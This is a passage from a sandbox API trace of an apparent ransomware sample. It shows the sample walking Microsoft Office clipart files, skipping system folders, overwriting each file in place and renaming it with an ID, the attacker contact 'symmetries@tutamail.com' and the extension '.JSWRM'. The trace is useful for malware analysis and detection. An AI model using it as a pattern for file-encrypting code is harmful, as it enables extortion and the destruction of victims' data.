0x2109a8 [0097.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0097.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0097.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0097.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0097.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0097.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0097.825] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02439_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02439_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02439_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0097.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0097.826] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a54, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02464_.WMF", cAlternateFileName="")) returned 1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2=".") returned 1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="..") returned 1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="...") returned 1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="windows") returned -1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="recovery") returned 1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="perflogs") returned 1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="documents and settings") returned 1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="system volume information") returned -1 [0097.826] lstrcmpiW (lpString1="SO02464_.WMF", lpString2="msocache") returned 1 [0097.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0097.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02464_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02464_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02464_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0097.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0097.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02464_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02464_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02464_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0097.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0097.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0097.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0097.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02464_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.827] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6740) returned 1 [0097.827] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a50) returned 0x205850 [0097.827] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a50, lpOverlapped=0x0) returned 1 [0097.865] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.865] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a50, lpOverlapped=0x0) returned 1 [0097.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.865] CloseHandle (hObject=0x314) returned 1 [0097.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0097.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0097.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0097.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0097.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0097.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0097.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0097.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0097.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0097.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02464_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02464_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02464_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0097.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0097.867] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x574, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02465_.WMF", cAlternateFileName="")) returned 1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2=".") returned 1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="..") returned 1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="...") returned 1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="windows") returned -1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="recovery") returned 1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="perflogs") returned 1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="documents and settings") returned 1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="system volume information") returned -1 [0097.867] lstrcmpiW (lpString1="SO02465_.WMF", lpString2="msocache") returned 1 [0097.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0097.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02465_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02465_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02465_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0097.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0097.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02465_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02465_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02465_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0097.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0097.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0097.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02465_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.868] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1396) returned 1 [0097.868] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x570) returned 0x2332c0 [0097.869] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x570, lpOverlapped=0x0) returned 1 [0097.870] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.870] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x570, lpOverlapped=0x0) returned 1 [0097.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0097.870] CloseHandle (hObject=0x314) returned 1 [0097.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0097.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0097.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0097.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0097.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0097.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0097.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.874] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02465_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02465_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02465_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0097.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0097.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0097.875] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1041ec4b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1041ec4b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1041ec4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19ca, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02578_.WMF", cAlternateFileName="")) returned 1 [0097.875] lstrcmpiW (lpString1="SO02578_.WMF", lpString2=".") returned 1 [0097.875] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="..") returned 1 [0097.875] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="...") returned 1 [0097.875] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="windows") returned -1 [0097.875] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="recovery") returned 1 [0097.876] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="perflogs") returned 1 [0097.876] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="documents and settings") returned 1 [0097.876] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.876] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="system volume information") returned -1 [0097.876] lstrcmpiW (lpString1="SO02578_.WMF", lpString2="msocache") returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0097.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02578_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02578_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02578_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0097.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02578_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02578_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02578_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0097.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0097.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0097.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02578_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.877] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6602) returned 1 [0097.877] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19c0) returned 0x205850 [0097.877] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x19c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x19c0, lpOverlapped=0x0) returned 1 [0097.879] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.879] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x19c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x19c0, lpOverlapped=0x0) returned 1 [0097.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.879] CloseHandle (hObject=0x314) returned 1 [0097.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0097.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0097.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0097.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0097.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0097.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.879] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02578_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02578_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 